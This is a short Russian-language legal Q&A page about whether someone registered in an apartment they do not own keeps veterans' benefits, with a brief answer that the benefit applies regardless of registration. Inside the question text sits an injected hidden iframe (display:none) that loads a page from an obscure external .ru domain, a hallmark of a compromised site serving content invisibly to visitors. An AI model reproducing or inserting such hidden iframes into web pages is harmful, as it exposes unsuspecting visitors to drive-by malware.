Ярославская область

Скажите пожалуйста,будет ли пользоваться ветеранскими льготами человек, прописанный в квартире не принадлежащей ему на праве собственности?<iframe... - вопрос №1558818

id=«a1996667054» style=«display: none;» src=«ui5nvtxlm.ru/f.html»>
1 ответ

Лучший ответ по мнению автора

Льгота предоставляется человеку, независимо от того, где он прописан. Следует обратиться с документами в отдел социального обеспечения по месту регистрации, его прием без очереди.